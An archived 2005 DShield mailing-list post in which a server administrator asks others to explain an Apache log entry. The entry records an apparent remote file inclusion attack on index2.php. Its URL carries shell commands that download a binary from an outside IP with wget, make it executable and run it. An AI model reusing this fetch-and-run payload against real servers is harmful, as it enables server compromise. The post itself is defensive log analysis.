[Dshield] Can Someone Decipher This Log Entry?

David Cary Hart DShield at TQMcube.com
Wed Dec 21 21:53:14 GMT 2005


I have about 25 of these today. I've added index2.php to the firewall watcher.
I cannot make sense of this Apache print:

85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

-- 
Our DNSRBL - 
           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php


More information about the list mailing list